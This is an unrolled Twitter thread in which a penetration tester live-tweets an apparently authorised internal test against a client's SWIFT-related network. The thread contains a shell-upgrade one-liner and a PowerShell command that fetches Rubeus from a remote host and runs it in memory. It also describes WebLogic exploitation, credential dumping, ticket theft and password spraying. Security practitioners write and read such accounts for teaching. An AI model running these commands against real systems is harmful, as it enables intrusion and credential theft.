Rattibha

Good morning my fellow #infosec and other curious individuals! Today is day TWO of my <semi> live tweeted Internal Penetration Test with Acme. Updates to follow. Here's the thread from yesterday:

First things first, gotta get the house situated so that I can be undistracted. Let's grab some breakfast, reestablish my tunnels and start taking a look at overnight scanning data.

Oh and If anyone is interested, This is my base playlist:
music.youtube.com
BUT I click "Start Radio" so that it gets stuff like the playlist. :)

music.youtube.com

Looks like one of the Nessus scanners picked up a bunch of WebLogic/Tomcat issues overnight. This is common with SWIFT. Let's take a look and maybe get a shell?

That AsyncResponse Vuln in WebLogic never disappoints! Linux shell obtained!

Need a ghetto TTY?
python -c 'import pty; pty.spawn("/bin/bash")'

Need to do some privilege escalation. For the sake of time, we'll use LinEnum. (I'm aware there are a bazillion other options)
github.com
I'm pretty sure it's an easy upgrade and this device is on the domain, so there's at least more I can do with it like 1/x

github.com

if it will allow me to login with the domain user I have, I may be able to escalate through that via some arbitrary policy that I've not discovered yet.

While enumerating stuff myself as the script is running, I found some passwords in ~/.bash_history! They don't work on any account on this device directly, but maybe in the domain?

That's a nope. Let's keep going.

Ok. Device wasn't connected to the domain, and there's no immediate way to root. Probably a ton of files that have juicy info in them, but we'll come back to it. There is another WebLogic server with this vulnerability. Let's hit that.

Ohh! This one is Windows, should be an instant SYSTEM shell if I can get it stable.

Was not a SYSTEM shell. But it did get me another user. Looks like this user has the ability to escalate to high-integrity:

Meterpreter is being killed immediately, so currently I'm just stuck with a shell. @zerosum0x0 created an awesome tool called Koadic, and I forked it when they took their leave of absence. I didn't really modify it.
github.com
This should be enough to dump lsass

github.com

@zerosum0x0 Ok. So even Koadic is getting eaten. No worries. We can do this with something else. I'll hold off on using Cobalt Strike for now.

@zerosum0x0 Ok had to step away for a second to marvel at the realization of what device I'm actually on. I can see every single SWIFT message before it's sent to the autoclient. Hell, I think I can manipulate them too. Screw it. I'm standing up Cobalt Strike.

@zerosum0x0 Lunch break! Be back shortly!

Ok. Back. That was annoying, and Cobalt Strike isn't needed. I just decided to exhaust different avenues of getting a solid shell. I was unsuccessful. BUT! Here's what I DO have now:
- Weak CMDShell
- A local Admin user I created (unneeded now)
- Valid TGT's for domain users! 1/x

I was successful in using the Weak CMDShell I got from exploiting WebLogic to execute Rubeus in memory. Check this out:
2/x

powershell.exe -c "$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://x.x.x.x/rubeus' -UseBasicParsing | Select-Object -ExpandProperty Content));[Rubeus.Program]::Main('triage')"

More DNS trouble. Back on track now! I think my next step will be to escalate in the domain. Playing with these half-privileges is causing more trouble than it's worth.

I stole one of the TGTs from this SWIFT device and used it against the only device that the user was Local Admin on. SMBExec'd and now I have a SYSTEM shell on a device!

Ok that's going to be all for the day! I was able to dump some hashes with CrackMapExec (which gave me a cleartext password), sprayed that and it gave me 3 more accounts, which gave me one more device to dump LSA. Pulling threads, I tell ya!
Speaking of:

Categories

More from this author

Related Threads

Popular Threads

Categories

More from this author

Related Threads

Popular Threads

Unroll Thread